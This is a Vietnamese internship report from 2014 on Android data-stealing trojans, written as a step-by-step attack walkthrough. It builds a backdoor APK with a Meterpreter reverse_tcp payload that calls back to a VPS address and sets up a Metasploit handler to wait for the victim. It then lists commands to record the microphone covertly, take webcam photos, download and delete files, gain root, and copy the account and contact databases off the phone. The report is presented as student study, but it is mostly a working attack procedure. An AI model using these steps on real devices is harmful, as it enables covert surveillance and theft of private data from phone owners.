1. BÁO CÁO THỰC TẬP
Đề tài:
Nghiên cứu các Trojan, Malware cho phép đánh
cắp dữ liệu như danh sách contact, tin nhắn trên
điện thoại sử dụng Android và gửi ra ngoài.
Phân tuần 6-7-8:
Tấn công máy Android bằng
máy chủ ảo VPS
Sinh viên thực hiện : Nguyễn Văn Thiên
GVHD : Võ Đỗ Thắng
TP. Hồ Chí Minh, ngày 05 tháng 10 năm 2014
2. 1. Tạo ứng dụng chứa mã độc trên Kali Linux:
Trước tiên, ta cần một ứng dụng backdoor để nạn nhân cài vào điện thoại Android
Bước 1: Khởi động máy ảo Kali Linux. Mở Terminal .
Bước 2: Thực hiện lệnh sau để tạo mã độc từ payload Meterpreter:
“msfpayload android/meterpreter/reverse_tcp lhost =<IP máy VPS> lport=<Mã port
muốn dùng> R > <đường dẫn lưu trữ> / <tên file>”
Giả sử: msfpayload android/meterpreter/reverse_tcp lhost=14.0.21.162 l port=4444 R>
/root/Desktop/hack.apk
2. Tấn công điện thoại Android:
Bước 1: Tại máy VPS, mở Metasploit Console. Đợi phần mềm khởi động, có thể mất vài
chục phút.
Bước 2: Tiến hành thiết đặt payload bằng các lệnh
“ use exploit/multi/handler ”
“ set payload android/meterpreter/reverse_tcp ”
“ set lhost 14.0.21.162 ”
“ set lport 4444 ”
“ run ”
Ta phải sử dụng đúng payload, lhost, lport mà ta đã dùng để tạo backdoor ở trên.
Bước 3: Sau đó, Metasploit sẽ khởi động 1 handler để chờ đợi sự kết nối từ máy Android
nạn nhân. Giả sử nạn nhân truy cập vào ứng dụng backdoor, ta sẽ nhận được thông báo như
sau:
Bước 4: Dùng lệnh “help” để kiểm tra các lệnh ta có thể thao tác
3. 3. Các phương thức tấn công được sử dụng:
Sau đây sẽ giới thiệu 1 số phương thức để tân công máy Android nạn nhân.
3.1 Ghi âm lén:
Sử dụng lệnh: “ record_mic <số giây ghi âm> ”
3.2 Sử dụng camera:
Xem danh sách webcam của thiết bị: “ webcam_list ”
Chụp ảnh lén: “webcam_snap <mã camera>”
3.3 Tải và xóa file bất kỳ từ bộ nhớ sdcard:
Di chuyển vào thư mục bằng lệnh: cd
Tải về bằng lệnh: download <tên file>
Xóa tập tin bằng lệnh: rm <tên file>
4.
5. 3.4 Truy cập trực ti ếp vào hệ thống:
Truy cập vào hệ thống bằng lệnh: “shell” > “su”
Kiểm tra máy đã root hay chưa bằng lệnh: “whoami”
Nếu kết quả trả về là “whoami: unknown uid 0” là máy đã được root. Ta có thể tiếp tục tấn
công.
3.5 Truy cập và khai thác tài khoản người dùng:
Thực hiện lệnh để vào xem file lưu tài khoản người dùng: “cd /data/system” > “ls –l”
Copy file về thẻ nhớ sdcard bằng lệnh: “cp accounts.db /sdcard”
Trở về meterpreter và tải file accounts.db về:
6.
7. Sử dụng tiện ích SQLite Manager trên Firefox để xem nội dung của accounts.db
3.6 Truy cập và đánh cắp danh bạ điện thoại:
Thực hiện lệnh để vào xem file lưu trữ danh bạ điện thoại:
“cd /data/data/com.android.providers.contacts/databases”
Copy về thẻ sdcard và tải về máy
8.
9. Xem nội dung của contacts2.db bằng SQLite Manager
10. 3.7 Một số câu l ệnh khác:
- Để biết thêm về các lệnh có thể thực hiện ta dùng help
- Để xem thông tin về máy, nhập lệnh sysinfo
- Để xem các tác vụ đang chạy gõ ps
- Xem ip của máy bị hack ta gõ ipconfig
- Xem danh sách thư mục, file gõ ls
- Để upload gõ lệnh upload
- ls -l danh mục file và các quyền
- Để ăn cắp tài khoản, mật khẩu, file apk và thay đổi các quyền
/DATA
/DATA/APP
/DATA/SYSTEM
/DATA/SYSTEM/accounts.db
/DATA/SYSTEM/SYNC/accounts.xml
/SYSTEM/APP/
- Để xem danh sách và down load các file hay thay đổi các file trong ROM
Đầu tiên phải gõ lệnh SU để có toàn quyền truy cập
Để có đường dẫn đầy đủ dùng lệnh chmod -R 777 path to filename
Ví dụ chmod -R 777 /data
Ctrl + C để quay lại